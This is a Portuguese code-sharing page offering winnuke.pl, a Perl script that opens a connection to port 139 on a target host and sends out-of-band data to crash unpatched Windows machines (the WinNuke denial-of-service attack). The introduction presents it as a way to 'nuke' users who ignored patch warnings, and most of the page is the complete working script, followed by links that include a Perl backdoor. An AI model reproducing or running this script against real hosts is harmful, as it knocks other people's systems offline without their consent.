Pode ser usado para nukar usuarios que ignoraram os avisos de correção

• Download winnuke.pl
• Enviar nova versão

Esconder código-fonte

#!/usr/bin/perl
# 
# winnuke.pl 

$ARGC=@ARGV;
print "winnuke.pl \n";
if ($ARGC !=1) {
   print "usar: $0 <host>\n";
        exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto,$line);
$remote=$ARGV[0];
$port = "139";
$iaddr = inet_aton($remote) or die "asdf";
$paddr = sockaddr_in($port, $iaddr) or die "asdf";
$proto = getprotobyname('tcp') or die "asdf";
print "Aguardando conexão para $ARGV[0]..";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "asdf";
connect(SOCK, $paddr) or die "asdf";;
print " [conectado: enviando OOB]\n";
$msg="H?~H?~H?~H?~";
send(SOCK,$msg,MSG_OOB) or die "done";
print "\neof -- nuke terminado\n";
exit;

Port Scan

Ossec2MySQL

Backdoor em perl

Script de Analise do Syslog SNORT

Testando servers a HTMLSCRIPT